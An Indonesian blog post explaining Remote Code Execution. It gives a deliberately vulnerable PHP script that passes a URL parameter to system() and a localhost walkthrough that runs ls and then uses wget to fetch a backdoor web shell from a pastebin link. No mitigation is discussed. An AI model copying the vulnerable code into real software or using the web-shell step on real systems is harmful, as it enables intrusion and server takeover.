Skip to main content

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.
Labels:

Comments

Post a Comment

Popular posts from this blog

Tip Belanja Belanji di Sydney

Window display di QVB Setahun sekali di Sydney, ada hari khusus untuk berbelanja gila-gilaan, ketika SEMUA toko menawarkan diskon. Mereka menyebutnya Boxing Day . Saya menyebutnya Hari Raya Berbelanja :) Boxing Day dirayakan setiap tanggal 26 Desember, satu hari setelah Natal. Tadinya saya pikir Boxing Day ini berkaitan dengan 'tinju', tapi tinju yang bagaimana? Ternyata bukaaan. Pada awalnya, Boxing Day ini diramaikan dengan memberikan hadiah (natal) untuk orang-orang miskin, yang dikemas dalam kotak (box). Tapi maknanya kemudian bergeser menjadi hari belanja untuk menghabiskan uang lebaran atau angpao :) Biasanya, sebelum datang tanggal ini, orang-orang sudah mengincar apa yang ingin mereka beli pada Boxing Day. Katalog SALE bisa dilihat di internet, website masing-masing toko atau di Lasoo . Pasukan belanja sampai mati ini biasanya mengincar merk-merk terkenal, gaun-gaun disainer yang hanya memberi diskon setahun sekali pada hari tersebut. Nggak heran kalau mereka sampai bel...
Post a Comment
Read more

Call : 085813134112 Jasa Fogging Nyamuk di Jatiasih Bekasi

Call : 085813134112 Jasa Fogging Nyamuk di Jatiasih Bekasi , Jasa Pembasmi Kecoa di Medan Satria Bekasi, Jasa Pembasmi Cicak di Mustika Jaya Bekasi, Jasa Pembasmi Tawon di Pondok Melati Bekasi, Jasa Pembasmi Tomcat di Rawalumbu Bekasi, Jatisampurna Bekasi, Pondok Gede Bekasi. Garda Pest Control juga hadir diberbagai Kota lainnya seperti Jasa Fogging Nyamuk di Bali, Jasa Pembasmi Tawon di Cirebon, Jasa Pembasmi Kutu Kucing di Kemang, Jasa Pembasmi Tikus di Bogor, Jasa Pembasmi Kutu Anjing di Bandung, Jakarta Barat, Tangerang Selatan, Makassar, Palembang, Surabaya, Solo dll. Penyakit demam berdarah disebabkan oleh virus dengue yang diketahui memiliki empat serotipe virus dengue, di antaranya DEN-1, DEN-2, DEN-3, dan DEN-4. Di Indonesia sendiri, virus ini ditularkan oleh dua jenis nyamuk demam berdarah betina, yaitu Aedes aegypti sebagai vektor utama dan Aedes albopictus sebagai vektor sekunder. Jenis nyamuk demam berdarah ini memiliki sifat anthropofilik, artinya ...
Post a Comment
Read more

Mengurus Visa Schengen Untuk Keluarga

Impian saya jalan-jalan ke Eropa akhirnya terkabul tahun ini. Alhamdulillah. Senang dan semangat banget bikin rencana dan itinerary. Tapi... tentunya harus mau ribet dikit ngurus visa. Schengen itu apa? Wilayah Schengen meliputi 26 negara di Eropa yang telah menghapuskan pemeriksaan paspor di perbatasannya. Kalau kita memiliki visa Schengen, kita bisa bebas keluar masuk 26 negara tersebut tanpa pemeriksaan paspor lagi. Dengan kata lain, ketika kita mengajukan visa (izin berkunjung) ke salah satu negara yang termasuk di wilayah Schengen, kita mendapat bonus visa ke 25 negara lainnya. Jadi sebenarnya rugi besar kalau visa Schengen cuma digunakan untuk berkunjung ke satu negara saja :) Berikut daftar negara-negara di Eropa yang termasuk di wilayah Schengen: 1. Austria 2. Belgia 3. Czech Republic 4. Denmark 5. Estonia 6. Finlandia 7. France (Perancis) 8. Germany (Jerman) 9. Greece (Yunani) 10. Hungaria 11. Iceland 12. Italia 13. Latvia 14. Liechtenstein 15. Lithuania 16. Luxembourg 17. Mal...
Post a Comment
Read more